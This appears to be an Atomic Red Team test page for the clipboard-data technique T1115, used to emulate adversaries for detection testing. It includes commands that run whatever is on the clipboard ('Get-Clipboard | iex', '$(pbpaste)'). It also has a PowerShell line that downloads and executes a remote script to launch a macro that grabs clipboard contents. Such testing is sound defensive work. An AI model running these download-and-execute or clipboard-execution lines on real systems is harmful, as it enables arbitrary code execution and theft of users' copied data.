Adversaries may collect data stored in the clipboard from users copying information within or between applications.In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command,
pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)
-
Atomic Test #1 - Utilize Clipboard to store or execute commands from
-
Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Add data to clipboard to copy off or execute commands from.
Supported Platforms: Windows
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txtdel %temp%\T1115.txt >nul 2>&1Utilize PowerShell to echo a command to clipboard and execute it
Supported Platforms: Windows
echo Get-Process | clip
Get-Clipboard | iexEcho a command to clipboard and execute it
Supported Platforms: macOS
echo ifconfig | pbcopy
$(pbpaste)This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| ms_product | Maldoc application Word | String | Word |
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignoretry {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"